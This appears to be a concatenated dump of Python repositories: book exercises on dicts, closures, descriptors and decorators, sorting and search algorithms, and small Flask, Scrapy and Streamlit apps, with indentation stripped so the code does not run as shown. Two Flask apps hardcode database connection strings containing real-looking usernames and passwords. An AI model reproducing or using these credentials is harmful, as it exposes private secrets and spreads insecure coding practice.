self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['id'], topic.id)
def tearDown(self):
print('running tearDown')
"""
class SimpleTest(TestCase):
@unittest.skip('skip test a')
def test_a(self):
print('running test a')
@unittest.skipIf(2 > 1, 'skip test b')
def test_b(self):
print('running test b')
@unittest.skipUnless(2 < 1, 'skip test c')
def test_c(self):
print('running test c')
``` |
{
"source": "jpch89/effectivepython",
"score": 3
} |
#### File: jpch89/effectivepython/ep004_helper.py
```python
from urllib.parse import parse_qs
# Parse the query string
my_values = parse_qs('red=5&blue=0&green=',
keep_blank_values=True)
# print(repr(my_values))  # the book's original version
print(my_values)  # the result is already a dict, so printing it directly is fine
# >>>
# {'red': ['5'], 'blue': ['0'], 'green': ['']}
# Query-string parameters may have multiple values or blank values,
# and some parameters may be missing entirely.
# dict.get() fetches values without raising when a key is absent.
print('Red: ', my_values.get('red'))
print('Green: ', my_values.get('green'))
print('Opacity: ', my_values.get('opacity'))
print('-' * 50)
# Goal: when a parameter is missing from the query string,
# or when its value is blank,
# return 0 instead.
# Idea: empty values and zero values are both falsy.
red = my_values.get('red', [''])[0] or 0
green = my_values.get('green', [''])[0] or 0
opacity = my_values.get('opacity', [''])[0] or 0
print('Red: %r' % red)
print('Green: %r' % green)
print('Opacity: %r' % opacity)
print('-' * 50)
# Goal: the final value must be an integer.
# Idea: convert the type explicitly.
red = int(my_values.get('red', [''])[0] or 0)
# A long expression like this is hard to read!
# Improvement 1: use the conditional expression added in Python 2.5
red = my_values.get('red', [''])
red = int(red[0]) if red[0] else 0
# Improvement 2: use a multi-line if/else statement
green = my_values.get('green', [''])
if green[0]:
green = int(green[0])
else:
green = 0
# Improvement 3: logic that is used repeatedly belongs in a helper function
def get_first_value(values, key, default=0):
found = values.get(key, [''])
if found[0]:
found = int(found[0])
else:
found = default
return found
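# Added check: the helper against the query string parsed above.
print('Red: %r' % get_first_value(my_values, 'red'))          # 5
print('Green: %r' % get_first_value(my_values, 'green'))      # 0 (blank value -> default)
print('Opacity: %r' % get_first_value(my_values, 'opacity'))  # 0 (missing key -> default)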
```
#### File: jpch89/effectivepython/ep012_forwhilenoelse.py
```python
for i in range(3):
print('循环 %d' % i)
else:
print('else 块!')
"""
循环 0
循环 1
循环 2
else 块!
"""
# Breaking out of the loop skips the else block
for i in range(3):
print('循环 %d' % i)
if i == 1:
break
else:
print('else 块!')
"""
循环 0
循环 1
"""
# If the iterable is empty, the else block runs immediately
for x in []:
print('永远不会执行!')
else:
print('我是 else 块!')
"""
我是 else 块!
"""
# If the while condition is False from the start, the else block also runs immediately
while False:
print('永远不会执行!')
else:
print('我是 else 块!')
"""
我是 else 块!
"""
# Check whether two numbers are coprime,
# i.e. they share no common divisor other than 1
a = 4
b = 9
for i in range(2, min(a, b) + 1):
print('尝试', i)
if a % i == 0 and b % i == 0:
print('不互质!')
break
else:
print('互质!')
"""
互质!
"""
# Check coprimality with a helper function (version 1)
def coprime(a, b):
for i in range(2, min(a, b) + 1):
if a % i == 0 and b % i == 0:
return False
return True
# Check coprimality with a helper function (version 2)
def coprime2(a, b):
is_coprime = True
for i in range(2, min(a, b) + 1):
if a % i == 0 and b % i == 0:
is_coprime = False
break
return is_coprime
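# Added check: both helpers agree with the loop/else version above.
assert coprime(4, 9) and coprime2(4, 9)          # no common divisor besides 1
assert not coprime(6, 9) and not coprime2(6, 9)  # both divisible by 3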
```
#### File: jpch89/effectivepython/ep015_nonlocal.py
```python
def sort_priority(values, group):
def helper(x):
if x in group:
return (0, x)
return (1, x)
values.sort(key=helper)
numbers = [8, 3, 1, 2, 5, 4, 7, 6]
group = {2, 3, 5, 7}
sort_priority(numbers, group)
print(numbers)
"""
[2, 3, 5, 7, 1, 4, 6, 8]
"""
# New requirement: report whether any number in numbers appears in group
def sort_priority2(numbers, group):
found = False
def helper(x):
if x in group:
            found = True  # looks simple enough
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found
numbers = [8, 3, 1, 2, 5, 4, 7, 6]
group = {2, 3, 5, 7}
found = sort_priority2(numbers, group)
print('Found:', found)
print(numbers)
# A match was clearly found, yet the flag says it was not!
"""
Found: False
[2, 3, 5, 7, 1, 4, 6, 8]
"""
def sort_priority2(numbers, group):
found = False # Scope: 'sort_priority2'
def helper(x):
if x in group:
found = True # Scope: 'helper' -- Bad!
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found
def sort_priority3(numbers, group):
found = False
def helper(x):
nonlocal found
if x in group:
found = True
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found
numbers = [8, 3, 1, 2, 5, 4, 7, 6]
group = {2, 3, 5, 7}
found = sort_priority3(numbers, group)
print('Found:', found)
print(numbers)
"""
Found: True
[2, 3, 5, 7, 1, 4, 6, 8]
"""
print('-' * 30)
class Sorter(object):
def __init__(self, group):
self.group = group
self.found = False
def __call__(self, x):
if x in self.group:
self.found = True
return (0, x)
return (1, x)
sorter = Sorter(group)
numbers.sort(key=sorter)
print(numbers)
assert sorter.found is True
"""
------------------------------
[2, 3, 5, 7, 1, 4, 6, 8]
"""
# Python 2
def sort_priority(numbers, group):
found = [False]
def helper(x):
        if x in group:
            found[0] = True
            return (0, x)
return (1, x)
numbers.sort(key=helper)
return found[0]
``` |
{
"source": "jpch89/fluentpython",
"score": 4
} |
#### File: fluentpython/Chapter1/ex1_1_cards.py
```python
import collections
Card = collections.namedtuple('Card', ['rank', 'suit'])
# the field names can also be given as one space-separated string
# Card = collections.namedtuple('Card', 'rank suit')
class FrenchDeck:
ranks = [str(n) for n in range(2, 11)] + list('JQKA')
suits = 'spades diamonds clubs hearts'.split()
def __init__(self):
self._cards = [Card(rank, suit) for suit in self.suits
for rank in self.ranks]
def __len__(self):
return len(self._cards)
def __getitem__(self, position):
return self._cards[position]
beer_card = Card('7', 'diamonds')
print(beer_card)
# Card(rank='7', suit='diamonds')
deck = FrenchDeck()
print(len(deck))
# 52
print(deck[0])
print(deck[-1])
from random import choice
print(choice(deck))
print(choice(deck))
print(choice(deck))
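# Added check: __len__ and __getitem__ also give us slicing, iteration and `in` for free.
print(deck[:3])                     # first three cards
print(Card('Q', 'hearts') in deck)  # True
for card in deck[:2]:               # iteration falls back to __getitem__
    print(card)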
``` |
{
"source": "jpch89/learningpython",
"score": 4
} |
#### File: learningpython/C20/myzip.py
```python
def myzip(*args):
iters = list(map(iter, args))
while iters:
res = [next(i) for i in iters]
yield tuple(res)
print(list(myzip('abc', 'lmn')))
"""
[('a', 'l'), ('b', 'm'), ('c', 'n')]
"""
```
#### File: learningpython/C32/scope.py
```python
def generate():
class Spam:
count = 1
def method(self):
print(count)
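            # Raises NameError when called: names assigned in the enclosing *class* body
            # (count) are not visible inside methods; use Spam.count or self.count instead.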
return Spam()
generate().method()
```
#### File: learningpython/C38/catcher.py
```python
class Wrapper:
def __init__(self, obj):
self.wrapped = obj
def __getattr__(self, attrname):
print('Trace: ' + attrname)
return getattr(self.wrapped, attrname)
x = Wrapper([1, 2, 3])
x.append(4)
print(x.wrapped)
"""
Trace: append
[1, 2, 3, 4]
"""
```
#### File: learningpython/C38/getattr-delegate.py
```python
class Person:
def __init__(self, name, job=None, pay=0):
self.name = name
self.job = job
self.pay = pay
def lastName(self):
return self.name.split()[-1]
def giveRaise(self, percent):
self.pay = int(self.pay * (1 + percent))
def __repr__(self):
return '[Person: %s, %s]' % (self.name, self.pay)
class Manager(Person):
def __init__(self, name, pay):
self.person = Person(name, 'mgr', pay)
def giveRaise(self, percent, bonus=.10):
self.person.giveRaise(percent + bonus)
# def __getattr__(self, attr):
# return getattr(self.person, attr)
def __getattribute__(self, attr):
print('**', attr)
if attr in ['person', 'giveRaise']:
return object.__getattribute__(self, attr)
else:
return getattr(self.person, attr)
# def __repr__(self):
# return str(self.person)
if __name__ == '__main__':
sue = Person('<NAME>', job='dev', pay=100000)
print(sue.lastName())
sue.giveRaise(.10)
print(sue)
tom = Manager('<NAME>', 50000)
print(tom.lastName())
tom.giveRaise(.10)
print(tom)
```
#### File: learningpython/C38/validate_descriptors1.py
```python
class CardHolder(object):
acctlen = 8
retireage = 59.5
def __init__(self, acct, name, age, addr):
self.acct = acct
self.name = name
self.age = age
self.addr = addr
class Name(object):
def __get__(self, instance, owner):
return self.name
def __set__(self, instance, value):
value = value.lower().replace(' ', '_')
self.name = value
name = Name()
class Age(object):
def __get__(self, instance, owner):
return self.age
def __set__(self, instance, value):
if value < 0 or value > 150:
raise ValueError('invalid age')
else:
self.age = value
age = Age()
class Acct(object):
def __get__(self, instance, owner):
return self.acct[:-3] + '***'
def __set__(self, instance, value):
value = value.replace('-', '')
if len(value) != instance.acctlen:
raise TypeError('invalid acct number')
else:
self.acct = value
acct = Acct()
class Remain(object):
def __get__(self, instance, owner):
return instance.retireage - instance.age
def __set__(self, instance, value):
raise TypeError('cannot set remain')
remain = Remain()
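# Added illustration (values are made up). Caveat: state lives on the descriptor objects
# (self.name, self.age, ...), which are class-level and therefore shared by every
# CardHolder instance.
if __name__ == '__main__':
    bob = CardHolder('1234-5678', 'Bob Smith', 40, '123 main st')
    print(bob.acct, bob.name, bob.age, bob.remain, bob.addr, sep=' / ')
    # 12345*** / bob_smith / 40 / 19.5 / 123 main st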
```
#### File: learningpython/C39/access1.py
```python
traceMe = False
def trace(*args):
if traceMe:
print('[' + ' '.join(map(str, args)) + ']')
# Private is really a decorator that takes arguments, so there are three layers:
# 1. the Private function, which returns a decorator
# 2. the onDecorator function, which returns a class
# 3. the onInstance class, which is what actually runs when the decorated class is instantiated
# privates is a tuple holding all of the private attribute names
def Private(*privates): # privates in enclosing scope
def onDecorator(aClass): # aClass in enclosing scope
class onInstance: # wrapped in instance attribute
def __init__(self, *args, **kargs):
                # wrap the Doubler instance in the onInstance instance attribute wrapped
self.wrapped = aClass(*args, **kargs)
            # attribute fetches made from outside the class are intercepted here,
            # e.g. label, data
def __getattr__(self, attr): # My attrs don't call getattr
trace('get:', attr) # Others assumed in wrapped
                if attr in privates:  # the attribute is listed as private
                    # raise an exception
raise TypeError('private attribute fetch: ' + attr)
                else:  # not private: fetch the attribute straight from the wrapped object
return getattr(self.wrapped, attr)
            # attribute assignments made from outside the class are intercepted here
def __setattr__(self, attr, value): # Outside accesses
trace('set:', attr, value) # Others run normally
                # if the attribute being set is wrapped,
                # we are in __init__ and the onInstance instance itself needs it,
                # so do not intercept: assign through the instance __dict__
if attr == 'wrapped': # Allow my attrs
self.__dict__[attr] = value # Avoid looping
                # if the attribute being set is listed as private
elif attr in privates:
                    # raise an exception
raise TypeError('private attribute change: ' + attr)
else:
                    # otherwise it is not private: route (delegate) the assignment to
                    # self.wrapped, i.e. the Doubler instance
setattr(self.wrapped, attr, value) # Wrapped obj attrs
return onInstance # Or use __dict__
return onDecorator
if __name__ == '__main__':
traceMe = True
    # two private attributes are declared here: data and size
@Private('data', 'size') # Doubler = Private(...)(Doubler)
class Doubler:
        # attribute access inside the class is not intercepted,
        # because self inside the class is the Doubler instance, not the onInstance instance;
        # all of Doubler's own attribute reads and writes stay unrestricted
def __init__(self, label, start):
self.label = label # Accesses inside the subject class
self.data = start # Not intercepted: run normally
def size(self):
return len(self.data) # Methods run with no checking
def double(self): # Because privacy not inherited
for i in range(self.size()):
self.data[i] = self.data[i] * 2
def display(self):
print('%s => %s' % (self.label, self.data))
    # what actually gets called here is the onInstance class;
    # its __init__ runs during creation,
    # and assigning self.wrapped triggers onInstance.__setattr__
    X = Doubler('X is', [1, 2, 3])  # label is set to 'X is', data to [1, 2, 3]
    Y = Doubler('Y is', [-10, -20, -30])  # label is set to 'Y is', data to [-10, -20, -30]
print()
"""
[set: wrapped <__main__.Doubler object at 0x000001726FA74278>]
[set: wrapped <__main__.Doubler object at 0x000001726FA742E8>]
"""
# The following all succeed
    # external access triggers onInstance.__getattr__;
    # label is not private, so it prints normally
print(X.label) # Accesses outside subject class
print()
"""
[get: label]
X is
"""
X.display(); X.double(); X.display() # Intercepted: validated, delegated
print()
"""
[get: label]
X is
[get: display]
X is => [1, 2, 3]
[get: double]
[get: display]
X is => [2, 4, 6]
"""
print(Y.label)
print()
"""
[get: label]
Y is
"""
Y.display()
Y.double()
Y.label = 'Spam'
Y.display()
"""
[get: display]
Y is => [-10, -20, -30]
[get: double]
[set: label Spam]
[get: display]
Spam => [-20, -40, -60]
"""
# The following all fail properly
"""
print(X.size()) # prints "TypeError: private attribute fetch: size"
print(X.data)
X.data = [1, 1, 1]
X.size = lambda S: 0
print(Y.data)
print(Y.size())
"""
``` |
{
"source": "jpch89/likepython",
"score": 3
} |
#### File: likepython/3/lk_020_nonlocal.py
```python
def test():
num = 10
def test2():
num = 666
print(num)
print(num)
test2()
print(num)
return test2
result = test()
"""
10
666
10
"""
def test():
num = 10
def test2():
nonlocal num
num = 666
print(num)
print(num)
test2()
print(num)
return test2
result = test()
"""
10
666
666
"""
``` |
{
"source": "jpch89/picalgo",
"score": 4
} |
#### File: jpch89/picalgo/pa01_binary_search.py
```python
def binary_search(array, item):
"""返回 item 在 array 中的下标,没找到返回 None。"""
low = 0
high = len(array) - 1
while low <= high:
mid = (low + high) // 2
guess = array[mid]
if guess == item:
return mid
elif guess > item:
high = mid - 1
else:
low = mid + 1
return None
if __name__ == '__main__':
array = [1, 2, 3, 4, 5, 6, 7, 8]
item = 7
print(binary_search(array, item))
"""
6
"""
```
#### File: jpch89/picalgo/pa02_selection_sort.py
```python
def find_smallest(arr):
"""返回数组中最小值的索引。"""
smallest = arr[0]
smallest_i = 0
for i in range(1, len(arr)):
if arr[i] < smallest:
smallest = arr[i]
smallest_i = i
return smallest_i
def selection_sort(arr):
"""对数组进行排序。"""
result = []
for i in range(len(arr)):
smallest_i = find_smallest(arr)
result.append(arr.pop(smallest_i))
return result
if __name__ == '__main__':
arr = [1, 4, 2, 7, 5, 8, 6, 3]
result = selection_sort(arr)
print(result)
"""
[1, 2, 3, 4, 5, 6, 7, 8]
"""
``` |
{
"source": "jpch89/pygamekidscancode",
"score": 3
} |
#### File: pygamekidscancode/pygame_template/sprite_example.py
```python
import pygame
import random
WIDTH = 800
HEIGHT = 600
FPS = 30
# define colors
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
class Player(pygame.sprite.Sprite):
# sprite for the player
def __init__(self):
# pygame.sprite.Sprite.__init__(self)
super().__init__()
self.image = pygame.Surface((50, 50))
self.image.fill(GREEN)
self.rect = self.image.get_rect()
self.rect.center = (WIDTH / 2, HEIGHT / 2)
def update(self):
self.rect.x += 5
if self.rect.left > WIDTH:
self.rect.right = 0
# initialize pygame and create window
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption('我的游戏')
clock = pygame.time.Clock()
all_sprites = pygame.sprite.Group()
player = Player()
all_sprites.add(player)
# Game loop
running = True
while running:
# keep loop running at the right speed
clock.tick(FPS)
# Process input (events)
for event in pygame.event.get():
# check for closing window
if event.type == pygame.QUIT:
running = False
# Update
all_sprites.update()
# Draw / Render
screen.fill(BLACK)
all_sprites.draw(screen)
# *after* drawing everything, flip the display
pygame.display.flip()
pygame.quit()
``` |
{
"source": "jpchagas/AdversarialSearchAlgorithm",
"score": 3
} |
#### File: AdversarialSearchAlgorithm/players/player_alphabeta.py
```python
from player import Player
from util import *
# ==========================================
# Player Alphabeta
# ==========================================
class AlphabetaPlayer(Player):
# ------------------------------------------
# Initialize
# ------------------------------------------
def __init__(self, symbol):
super(AlphabetaPlayer, self).__init__(symbol)
self.alpha = float('inf') * (-1)
self.beta = float('inf')
# ------------------------------------------
# Get next move
# ------------------------------------------
def get_next_move(self, board):
maxAction = None
maxValue = float('inf') * (-1)
succs = self.successors((board,0),self.me())
for succ in succs:
minVal = self.minValue(succ)
if minVal > maxValue:
maxValue = minVal
maxAction = succ[2]
return maxAction
def successors(self,state,sym):
available = find_empty_cells(state[0])
moves = state[1]+1
succs = []
for action in available:
nBoard = list(state[0])
nBoard[action] = sym
succs.append((nBoard,moves,action,len(available)-1))
return succs
def minValue(self,state):
if self.isTerminal(state):
return self.utility(state)
v = float('inf')
succs = self.successors(state,self.opp())
for succ in succs:
v = min(v,self.maxValue(succ))
if v <= self.alpha:
return v
self.beta = min(v,self.beta)
return v
def maxValue(self,state):
if self.isTerminal(state):
return self.utility(state)
v = float('inf') * (-1)
succs = self.successors(state,self.me())
for succ in succs:
v = max(v,self.minValue(succ))
if v >= self.beta:
return v
self.alpha = max(self.alpha,v)
return v
def isTerminal(self,state):
return (state[3] <= 0) or (find_winner(state[0])[0] != None)
def utility(self,state):
winner = find_winner(state[0])[0]
if winner == None:
return 0
if winner == self.me():
return 10 - (state[1])
if winner == self.opp():
return (state[1]) - 10
```
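One caveat in the version above: `alpha` and `beta` are stored on the player instance, so the pruning bounds persist across sibling branches and across calls to `get_next_move`. A minimal sketch of the conventional formulation, where the bounds are local to each recursive call (generic code, not the repository's; `successors`, `is_terminal` and `utility` are callbacks the caller supplies):
```python
# Hedged sketch: textbook alpha-beta with per-call bounds.
import math

def alphabeta(state, maximizing, alpha, beta, successors, is_terminal, utility):
    if is_terminal(state):
        return utility(state)
    if maximizing:
        value = -math.inf
        for succ in successors(state, True):
            value = max(value, alphabeta(succ, False, alpha, beta, successors, is_terminal, utility))
            if value >= beta:            # opponent will never let play reach this branch
                return value
            alpha = max(alpha, value)
        return value
    value = math.inf
    for succ in successors(state, False):
        value = min(value, alphabeta(succ, True, alpha, beta, successors, is_terminal, utility))
        if value <= alpha:               # the maximizer already has a better option elsewhere
            return value
        beta = min(beta, value)
    return value
```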
#### File: jpchagas/AdversarialSearchAlgorithm/util.py
```python
EMPTY = None
O = "O"
X = "X"
DRAW = False # If there is no winner
# ------------------------------------------
# Find winner
# ------------------------------------------
def find_winner(board):
for c in [
# Rows
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
# Cols
[0, 3, 6],
[1, 4, 7],
[2, 5, 8],
# Diagonals
[0, 4, 8],
[2, 4, 6]
]:
# Check if a combination is filled by the same symbol
if board[c[0]] and board[c[0]] == board[c[1]] and board[c[0]] == board[c[2]]:
return (board[c[0]], c)
return (None, [])
# ------------------------------------------
# Find empty cells
# ------------------------------------------
def find_empty_cells(board):
return [index for index in range(9) if board[index] is None]
# ------------------------------------------
# Print board
# ------------------------------------------
def print_board(board):
content = list(board)
content = [" " if play == None else play for i, play in enumerate(content)]
print """
% | % | %
% | % | %
% | % | %
""".replace("%", "{}").format(*content)
``` |
{
"source": "jpchagas/enriching-customer-database",
"score": 2
} |
#### File: jpchagas/enriching-customer-database/application.py
```python
from flask import Flask , redirect
from model.models import Base , People, Address
from flask_sqlalchemy import SQLAlchemy
import requests
import json
import atexit
from apscheduler.scheduler import Scheduler
application = Flask(__name__)
cron = Scheduler(daemon=True)
application.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://j4h6pfu6j2hsgjsx:jnrhopjytnncg7ij@<EMAIL>ysz6rn1f.cbetxkdyhwsb.us-east-1.<EMAIL>:3306/tqq7jin5tgyki2cl'
#application.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://dba:pegasos93@localhost:3306/rbsdb'
db = SQLAlchemy(application)
cron.start()
@cron.interval_schedule(minutes=1)
def batch():
#requests.get('http://127.0.0.1:5000/update')
requests.get('https://enriching-customer-database.herokuapp.com//update')
print('Requested')
@application.before_first_request
def setup():
#Base.metadata.drop_all(bind=db.engine)
Base.metadata.create_all(bind=db.engine)
#new_people = People('<NAME>', '<EMAIL>','username','password','gender','photo')
#db.session.add(new_people)
#db.session.commit()
#db.session.add(Address(new_people.id, 'teste',1234,'teste','teste'))
#db.session.commit()
@application.route('/update')
def update():
resp = requests.get('https://randomuser.me/api/').json()['results'][0]
new_people = People(resp['name']['first'] + ' ' + resp['name']['last'],
resp['email'],
resp['login']['username'],
resp['login']['password'],
resp['gender'],
resp['picture']['large'])
db.session.add(new_people)
db.session.commit()
new_address = Address(new_people.id,
resp['location']['street']['name'],
resp['location']['street']['number'],
resp['location']['city'],
resp['location']['state'])
db.session.add(new_address)
db.session.commit()
return redirect('/')
@application.route('/')
def root():
person = db.session.query(People).all()
return u"<br>".join([u"{0}: {1}".format(p.name, p.email) for p in person])
@application.route('/updateapi')
def updateapi():
#resp = peoplecontroller.update_api()
#return resp
pass
@application.route('/userbygenderbycity')
def userbygenderbycity():
    p = {}
a = 1
info = db.session.query(Address.city,People.gender,db.func.count(People.id)).join(Address, People.id == Address.pessoa_id).group_by(Address.city,People.gender).all()
for i in info:
p[a] = {'city':i[0],
'gender':i[1],
'amout': i[2]}
a = a + 1
return json.dumps(p,indent=2)
atexit.register(lambda: cron.shutdown(wait=False))
if __name__ == "__main__":
application.debug = True
application.run()
``` |
{
"source": "jpchagas/navigation-tool-time-prediction-improvement",
"score": 3
} |
#### File: jpchagas/navigation-tool-time-prediction-improvement/models.py
```python
from sqlalchemy import Column, Integer, String, ForeignKey, DateTime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Events(Base):
__tablename__='events'
id = Column(Integer,primary_key=True)
begin = Column(DateTime,nullable=False)
end = Column(DateTime)
description = Column(String(200),nullable=False)
attend = Column(Integer, nullable=False)
establishments_id = Column(Integer,ForeignKey("establishments.id"),nullable=False)
def __init__(self,begin=None, end=None, description=None,attend=None,establishments_id=None):
self.begin=begin
self.end=end
self.description=description
self.attend=attend
self.establishments_id=establishments_id
def __repr__(self):
pass
class Establishments(Base):
__tablename__='establishments'
id = Column(Integer,primary_key=True)
name = Column(String(50),nullable=False)
address_id = Column(Integer,ForeignKey("adresses.id"),nullable=False)
def __init__(self,name=None,address_id=None):
self.name=name
self.address_id=address_id
def __repr__(self):
pass
class Users(Base):
__tablename__='users'
id = Column(Integer,primary_key=True)
fullname = Column(String(50),nullable=False)
username = Column(String(50),nullable=False)
email = Column(String(50),nullable=False)
def __init__(self,fullname=None,username=None,email=None):
self.fullname=fullname
self.username=username
self.email=email
def __repr__(self):
pass
class Adresses(Base):
__tablename__='adresses'
id = Column(Integer,primary_key=True)
#cep = Column(Integer,nullable=False)
cidade = Column(String(50),nullable=False)
bairro = Column(String(50),nullable=False)
estado = Column(String(50),nullable=False)
logradouro = Column(String(50),nullable=False)
numero = Column(String(50),nullable=False)
def __init__(self,cidade=None,bairro=None,estado=None,logradouro=None,numero=None):
#self.cep=cep
self.cidade=cidade
self.bairro=bairro
self.estado=estado
self.logradouro=logradouro
self.numero=numero
def __repr__(self):
pass
class EventsList(Base):
__tablename__='evenslist'
user_id = Column(Integer,ForeignKey("users.id"),primary_key=True)
event_id = Column(Integer,ForeignKey("events.id"),primary_key=True)
def __init__(self):
pass
def __repr__(self):
pass
#class Directions(Base):
# __tablename__ = 'directions'
# def __init__(self):
# pass
# def __repr__(self):
# pass
``` |
{
"source": "jpchagas/stock-exchange-analysis",
"score": 3
} |
#### File: jpchagas/stock-exchange-analysis/app.py
```python
import streamlit as st
import numpy as np
import pandas as pd
from pandas_datareader import data as wb
import matplotlib.pyplot as plt
import datetime
from dao.news_dao import NewsDAO
from dao.stock_dao import StockDAO
def main():
stock = st.sidebar.text_input("Enter your stock code","ITSA4.SA")
start_date = st.sidebar.date_input('Start date',datetime.date.today()-datetime.timedelta(days=30))
end_date = st.sidebar.date_input('End date',datetime.date.today())
st.title("Stock Monitor")
stock_name = StockDAO().getStockName(stock)
news_source = NewsDAO().getNews(stock_name,start_date,end_date)
news_list = NewsDAO().create_news(news_source)
news_df = pd.DataFrame(NewsDAO().getJsonList(news_list))
price = StockDAO().getStock(stock,start_date,end_date)
st.dataframe(price)
st.line_chart(price)
ac1 = price
size = len(ac1)-1
xn = ac1[size]
x1 = ac1[0]
st.header('Valor Inicial: %s' % round(x1,2))
st.header('Valor Atual: %s' % round(xn,2))
rentabilidade = round(((xn/x1)-1)*100,2)
st.header('Rentabilidade: %s' % rentabilidade)
#st.text(rentabilidade)
st.dataframe(news_df)
if __name__ == '__main__':
main()
```
#### File: stock-exchange-analysis/model/news.py
```python
class News():
def __init__(self, news_source):
self.source = news_source['source']['name']
self.author = news_source['author']
self.title = news_source['title']
self.description = news_source['description']
self.url = news_source['url']
self.publishedAt = news_source['publishedAt']
self.resume = news_source['content']
'''
"source":{
"id":"globo",
"name":"Globo"
},
"author":"None",
"title":"Petrobras inicia fase vinculante para venda da subsidiária Pbio",
"description":"SÃO PAULO (Reuters) - A Petrobras iniciou nesta segunda-feira a fase não vinculante do processo de venda da subsidiária integral Petrobras Biocombustível (Pbio), informou a empresa em comunicado ao mercado.Fundada em...Leia mais",
"url":"https://extra.globo.com/noticias/economia/petrobras-inicia-fase-vinculante-para-venda-da-subsidiaria-pbio-24564990.html",
"urlToImage":"https://extra.globo.com/skins/extra/images/extra-face-1.jpg",
"publishedAt":"2020-08-03T22:04:00Z",
"content":"SÃO PAULO (Reuters) - A Petrobras iniciou nesta segunda-feira a fase não vinculante do processo de venda da subsidiária integral Petrobras Biocombustível (Pbio), informou a empresa em comunicado ao m… [+1120 chars]"
},
'''
def getJson(self):
json = {
"source":self.source,
"title":self.title,
"resume":self.resume,
"description":self.description,
"url":self.url,
"author":self.author,
"publishedAt":self.publishedAt,
}
return json
```
#### File: jpchagas/stock-exchange-analysis/stock.py
```python
import numpy as np
import pandas as pd
from pandas_datareader import data as wb
import matplotlib.pyplot as plt
stocks = ['ABEV3.SA','MGLU3.SA','BBAS3.SA','BRKM5.SA','BBDC4.SA','AZUL4.SA','ITUB4.SA','BBDC3.SA','VALE3.SA','PETR4.SA','RENT3.SA','SUZB3.SA','CIEL3.SA','GOLL4.SA','GNDI3.SA','BRAP4.SA','B3SA3.SA','BTOW3.SA','EQTL3.SA']
#TickerA='ITSA4.SA'
#TickerB='FLRY3.SA'
#TickerC='LREN3.SA'
prices=pd.DataFrame()
#tickers = [TickerA, TickerB, TickerC]
print(prices)
def getStock(s):
print(s)
return wb.DataReader(s, data_source='yahoo', start='2020-8-9')['Adj Close']
stock = 'ITSA4.SA'
print(getStock(stock))
#for s in stocks:
#prices[s]=wb.DataReader(s, data_source='yahoo', start='2020-3-9')['Adj Close']
#(ac1/ac1.iloc[0]*100).plot(figsize=(15,5))
#plt.ylabel('NORMALIZED PRICES')
#plt.xlabel('DATE')
#plt.show()
``` |
{
"source": "jpchagas/treinamento-flask",
"score": 2
} |
#### File: jpchagas/treinamento-flask/app.py
```python
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/inicio')
def ola():
return render_template('lista.html');
app.run()
``` |
{
"source": "jpchagas/xepa-crawler",
"score": 2
} |
#### File: jpchagas/xepa-crawler/app.py
```python
from flask import Flask
import os
app = Flask(__name__)
@app.route('/')
def hello():
os.chdir(os.getcwd() + "/xepacrawler")
os.system('scrapy crawl ceasars')
return 'Hello, World!'
if __name__ == "__main__":
app.run()
```
#### File: xepa-crawler/tests/test_global.py
```python
class TestGlobal:
def test_insert_prices(self):
assert True
def test_get_prices(self):
assert True
def test_get_price(self):
assert True
```
#### File: xepacrawler/utils/url_helper.py
```python
from .date_helper import DateHelper
class UrlHelper:
def __init__(self):
self.dh = DateHelper()
#'http://ceasa.rs.gov.br/tabcotacao/02-03-2021/'
def current_url(self):
urls = []
prefix = r'http://ceasa.rs.gov.br/tabcotacao/'
data = self.dh.get_current_date()
url = prefix + data.strftime('%d-%m-%Y') + '/'
url1 = prefix + 'cotacao-' + data.strftime('%d-%m-%Y') + '/'
urls.append(url)
urls.append(url1)
return urls
def range_urls(self, begin, end):
urls = []
prefix = r'http://ceasa.rs.gov.br/tabcotacao/'
for data in self.dh.get_dates_range(begin, end):
url = prefix + data.strftime('%d-%m-%Y') + '/'
url1 = prefix + 'cotacao-' + data.strftime('%d-%m-%Y') + '/'
urls.append(url)
urls.append(url1)
return urls
#self.dh.get_dates_range(begin, end)
``` |
{
"source": "jpchagas/xepa-service",
"score": 3
} |
#### File: src/routes/route_unit.py
```python
from flask import Blueprint, request
from src.service.service_unit import UnitService
route_unit = Blueprint('unit', __name__)
us = UnitService()
@route_unit.route("/unit", methods=['GET'])
def get_units():
return us.get_units()
@route_unit.route("/unit", methods=['POST'])
def post_units():
return us.insert_unit(request.json)
@route_unit.route("/unit/<description>", methods=['GET'])
def get_unit(description):
return us.get_unit(description)
@route_unit.route("/unit/<description>", methods=['DELETE'])
def delete_unit(description):
return us.delete_unit(description)
@route_unit.route("/unit/<description>", methods=['UPDATE'])
def update_unit(description):
return us.update_unit(description)
```
#### File: src/service/service_product.py
```python
from src.repository.repository_product import ProductRepository
import json
class ProductService:
def __init__(self):
self.pr = ProductRepository()
def insert_product(self, body):
p = self.pr.insert(body['description'])
return json.dumps({"id": p.id,
"description": p.description
})
def get_products(self):
products = self.pr.get_all()
products_tuples = [(u.id, u.description) for u in products]
return json.dumps(dict(products_tuples))
def get_product(self, description):
p = self.pr.get_one(description)
return json.dumps({"id": p.id,
"description": p.description
})
def update_product(self, description):
self.pr.update(description)
def delete_product(self, description):
self.pr.delete(description)
```
#### File: tests/service/test_price.py
```python
from src.service.service_price import PriceService
class TestPrice:
def test_insert_prices(self):
assert True
def test_get_prices(self):
assert True
def test_get_price(self):
assert True
``` |
{
"source": "jpchato/data-structures-and-algorithms-python",
"score": 4
} |
#### File: challenges/insertion_sort/test_insertion_sort.py
```python
from insertion_sort import insertion_sort
def test_insertion_sort():
array_one = [5, 26, 9, 4, 3]
actual = insertion_sort(array_one)
expected = [3, 4, 5, 9, 26]
assert actual == expected
def test_negative_insertion_sort():
array_two = [-1, 2, 7, -100, 42]
actual = insertion_sort(array_two)
expected = [-100, -1, 2, 7, 42]
assert actual == expected
def test_duplicates_insertion_sort():
array_three = [4, 1, 2, 2, 4, -23, -100, 1]
